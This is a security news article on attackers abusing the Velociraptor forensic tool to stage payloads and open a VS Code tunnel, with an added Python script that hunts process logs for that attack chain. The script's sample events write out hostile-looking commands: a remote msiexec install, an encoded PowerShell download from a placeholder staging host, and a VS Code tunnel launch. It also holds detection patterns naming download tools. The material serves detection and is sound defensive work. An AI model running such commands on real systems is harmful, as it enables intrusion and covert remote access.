Redazione RHC : 5 September 2025 12:30
Sophos security specialists have drawn attention to a cyberattack in which unknown attackers used the open-source forensic tool Velociraptor to monitor endpoints.
“In this incident, attackers used a tool to download and run Visual Studio Code with the likely intent of creating a tunnel to a command-and-control server,” said experts from the Sophos Counter Threat Unit.
The report notes that attackers often rely on “living-off-the-land” (LotL) tactics and abuse legitimate remote monitoring and management (RMM) tools, but the use of Velociraptor marks an evolution of that approach: incident response software itself is now being repurposed for malicious ends.
Analysis of the incident showed that the attackers used the Windows msiexec utility to download an MSI installer from a Cloudflare Workers domain, which also served as a staging area for other tools used by the attackers, including the Cloudflare tunneling tool and the Radmin remote administration utility.
The MSI file was designed to deploy Velociraptor, which then communicated with a second Cloudflare Workers domain. That access was used to download Visual Studio Code from the same staging server via an encoded PowerShell command and to run it with its tunnel option enabled, giving the attackers both remote access and remote code execution.
The attackers were also observed reusing msiexec to download further payloads. “Organizations should monitor and investigate unauthorized use of Velociraptor and consider the use of such tactics as a precursor to ransomware distribution,” Sophos warns.
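As a starting point for the monitoring Sophos recommends, the following is an added example (not code from the Sophos or Rapid7 reports) that walks a set of constructed process-creation events modelled on Sysmon Event ID 1 fields and flags each stage of the chain described above: msiexec installing an MSI from a remote URL, Velociraptor being launched by the installer, an encoded PowerShell command that decodes to a download, and VS Code started in tunnel mode. The hostnames, the `workers.dev` staging domain, file paths and the log layout are all assumptions made for the example; the real incident's indicators are not named on this page.

```python
"""Hunt process-creation events for the msiexec / Velociraptor / VS Code tunnel chain."""
import base64
import re


def _enc(ps: str) -> str:
    """Encode a PowerShell command the way -EncodedCommand expects it (UTF-16LE, base64)."""
    return base64.b64encode(ps.encode("utf-16le")).decode("ascii")


# Constructed sample events (Sysmon Event ID 1 style, simplified), NOT logs from the
# Sophos incident. Hostnames, domains and paths are placeholders chosen for the example.
SAMPLE_EVENTS = [
    {"host": "WS01", "image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "msiexec.exe /q /i https://example-stage.workers.dev/setup.msi"},
    {"host": "WS01", "image": r"C:\Program Files\Velociraptor\Velociraptor.exe",
     "parent": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'"C:\Program Files\Velociraptor\Velociraptor.exe" --config client.config.yaml service run'},
    {"host": "WS01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Program Files\Velociraptor\Velociraptor.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + _enc(
         r"Invoke-WebRequest -Uri https://example-stage.workers.dev/code.zip -OutFile C:\ProgramData\code.zip")},
    {"host": "WS01", "image": r"C:\ProgramData\code\code.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "code.exe tunnel --accept-server-license-terms --name ws01"},
    # Benign activity that must not fire: a local MSI install and a plain script invocation.
    {"host": "WS02", "image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"msiexec.exe /i C:\Users\alice\Downloads\7zip.msi /qn"},
    {"host": "WS02", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell.exe -File C:\scripts\inventory.ps1"},
]

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand|encoded)\s+([A-Za-z0-9+/=]{16,})")
URL = re.compile(r"(?i)\bhttps?://[^\s\"']+")
DOWNLOAD_CMDLETS = re.compile(
    r"(?i)invoke-webrequest|\biwr\b|invoke-restmethod|downloadfile|downloadstring|start-bitstransfer|\bcurl\b|\bwget\b")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None when absent or malformed."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(ev):
    """Return the findings for one process-creation event (empty list when benign)."""
    image, parent, cmd = ev["image"].lower(), ev["parent"].lower(), ev["cmdline"]
    findings = []
    if image.endswith("msiexec.exe") and URL.search(cmd):
        findings.append("msiexec installing MSI from remote URL")
    if "velociraptor" in image or "velociraptor" in cmd.lower():
        findings.append("Velociraptor client execution (verify against IR tooling inventory)")
        if parent.endswith("msiexec.exe"):
            findings.append("Velociraptor launched by MSI installer")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        findings.append("encoded PowerShell command")
        if DOWNLOAD_CMDLETS.search(decoded) and URL.search(decoded):
            findings.append("encoded PowerShell downloads from " + URL.search(decoded).group(0))
    if image.endswith("code.exe") and re.search(r"(?i)\btunnel\b", cmd):
        findings.append("VS Code started in tunnel mode (remote access channel)")
    return findings


def scan(events):
    """Group findings per host; a host showing several stages of the chain goes to the top of the queue."""
    report = {}
    for ev in events:
        hits = classify(ev)
        if hits:
            report.setdefault(ev["host"], []).extend(hits)
    return report


if __name__ == "__main__":
    for host, hits in scan(SAMPLE_EVENTS).items():
        print(host)
        for h in hits:
            print("  -", h)
```

A single finding is weak on its own: legitimate Velociraptor deployments are also pushed by MSI, and VS Code tunnels are used by developers. The value is in the stacking on one host, which is why the scan groups by host rather than emitting isolated alerts; the Velociraptor hit should be reconciled against the organisation's own IR tooling inventory before it is escalated.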
After Sophos published its report, Rapid7, which maintains Velociraptor, released a white paper detailing how organizations can detect misuse of Velociraptor in their environments.
“Rapid7 is aware of reports of abuse of the open-source incident response tool Velociraptor. Velociraptor is widely used by defenders for legitimate digital forensics and incident response purposes. But like many other security and administrative tools, it can be used for malicious purposes if it falls into the wrong hands,” the developers comment.